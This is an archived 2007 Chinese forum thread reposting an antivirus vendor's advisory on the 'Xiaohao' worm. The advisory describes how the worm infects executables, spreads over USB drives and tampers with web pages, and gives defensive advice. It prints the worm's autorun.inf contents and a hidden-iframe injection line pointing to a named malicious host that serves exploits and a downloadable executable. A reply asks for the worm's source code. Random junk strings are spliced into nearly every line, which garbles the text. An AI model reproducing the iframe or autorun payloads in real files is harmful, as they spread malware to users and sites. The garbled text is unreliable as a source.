星星电脑技术论坛's Archiver

52硬件 发表于 2007-8-23 10:06

“小浩”蠕虫病毒公告

“小浩”蠕虫病毒公告
TG1`Jz8d*Yt#I-K/?d
n CJ)j"GPT5Lu&x [table=85%][tr][td][font=Arial][信息来源:江民科技] [/font][/td][/tr][tr][td][table=98%][tr][td][font=Arial][/font][/td][/tr][tr][td][table=98%][tr][td][font=宋体][size=12pt]8月14日,江民科技反病毒中心监测到,一种名为“小浩”蠕虫病毒出现在互联网上,该病毒和“熊猫烧香”蠕虫病毒类似,可以感染 *.exe可执行程序,可以通过U盘传播,还会感染各种网页脚本程序,插入带毒网址。但是与“熊猫烧香”蠕虫病毒不同的是,被感染后的*.exe文件将遭到破坏且无法恢复!7`9pS!Q/j'i$a Pl1WR
江民反病毒专家分析该病毒详细技术特征如下:
fO k[!O"FG7sA
XX8g[Xu#~.]2w 病毒名称:Worm/XiaoHao.a
X9u]kRV 中 文 名:小浩蠕虫J"J_t&@9s3B%H0X8w
病毒类型:蠕虫 rC.g9Tu \ | y
危害等级:★★★★
^Qx0r1tRq4f 影响平台:Win 9X/ME/NT/2000/XP/2003
V _W;p+B;c:Z ^"QU3\[.i 病毒运行特征:_mkf)niNS
Worm/XiaoHao.a 蠕虫采用Visual C++6.0 工具编写,并经过UPX工具加壳处理,病毒运行后,会在每个硬盘的根目录下释放病毒文件:
-|%Iz%f-N"yQg c:xiaohao.exe, 402706字节Z-|R k9n AF-R Z;M
c:autorun.inf, 91字节Uo.Z%fA(f8W:])qm
其中xiaohao.exe 文件为病毒主体,该文件运行后搜索全盘扩展名为*.exe 的文件,将自身病毒体写入到正常文件中,从而使原文件成为新的病毒体。被感染后的文件图标为一个有“浩”字的图标,当浏览含有被感染病毒文件的窗口时,窗口的标题栏会有已中毒 X14o-H4o's Virus 的字样。2s;IMyBLS4]
如下图:d6g"pd/F#m'h[5m

p p J.s Y/F0p [/size][/font]cbM&[E2B
[align=center][img]http://www.jiangmin.com/images/xiaohao.jpg[/img][/align]~&_8P {a
由于该病毒采用的是覆盖式写入,因此被感染后的文件无法恢复。
9CbT%dFY5H6O 该病毒进程还会创建iexplore.exe 子进程,利用多个系统漏洞下载木马病毒。
L){2I4J]v0~!]?](f 另外,病毒还在各个硬盘跟目录下释放的autorun.inf 文件是病毒主体的伴生文件,该文件内容如下:
K8l:M,F}6m [Autorun]
(_ T;f:Y)M i o open=Xiaohao.exe
W:z"DF.O9F+U:LS9E shellexecute=Xiaohao.exe
}$k'o5W&bq shellAutocommand=Xiaohao.exe
5L*@#sj&^E MG 这样,该病毒就可以利用Windows系统的自动播放功能借助于U盘来传播,当用户在不知情的情况下,双击已感染该病毒的U盘时,就会将病毒传播到新的系统中。
h3U&bx"k 该病毒还会搜索全盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件,向其中插入恶意网址连接<iframe src=http://xiaohao.yona.biz/***.htm width=0 height=0></iframe>,该病毒网址会利用MS06-014、MS06-046、MS07-017 等多个系统漏洞下载并且执行病毒文件[url]http://xiaohao.yona.biz/[/url]***.exe ,该文件为病毒体自身。
FX.n1I5s u 该病毒会将系统时间修改为2005年1月17日,使一些杀毒软件的使用授权失效,病毒还会模拟鼠标操作,企图绕过杀毒软件的主动防御功能。
H h;_-hE 该病毒会将其他未被感染的文件设置成隐藏属性,还会生成文件:c:Jilu.txt,用以记录被感染的文件和被隐藏的文件。该病毒还会破坏注册表相关键值,使其不能显示隐藏文件,严重影响了电脑的正常使用。NDu#kXfi:y3J-?:X
据悉,该病毒作者还将病毒源代码公布在互联网上,并且还留下了自己的QQ号和博客地址,称“欢迎各位大牛. 来指导我  或者是交流” ,具有明显的技术炫耀性。 Y&x5GZ'a1f.vei ?

2WA)i,w$]/b7k 针对此病毒,江民科技已经紧急升级了病毒库,只要升级到8月14日的病毒库,即可拦截此病毒的入侵。e@1GY3p~
.hS8t7i^N:@
江民反病毒专家建议广大用户:
q Rtn3C AD R {y :ujKc1R_-g
1. 安装KV2007的杀毒软件,开启每天定时升级病毒库,定时杀毒功能,并开启所有的监控功能。
a^K,Oo0Y z a 2. 禁用系统的自动播放功能,防止病毒从U盘、移动硬盘、MP3等移动存储设备进入到计算机。(xK%xG Ci"|q
禁用Windows 系统的自动播放功能的方法:在运行中输入 gpedit.msc 后回车,打开组策略编辑器,依次点击:计算机配置->管理模板->系统->关闭自动播放->已启用->所有驱动器->确定。
;~-K({&L^iD 3. 利用Windows Update功能打全系统补丁,避免病毒从网页木马的方式入侵到系统中。
r}+ejQzzb2~4g
`\[$ats U-T [/td][/tr][/table][/td][/tr][/table][/td][/tr][/table]

幽明子 发表于 2007-8-23 23:29

有源代码没??

页: [1]
手机号码所在地查询:
Google
IP地址:

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.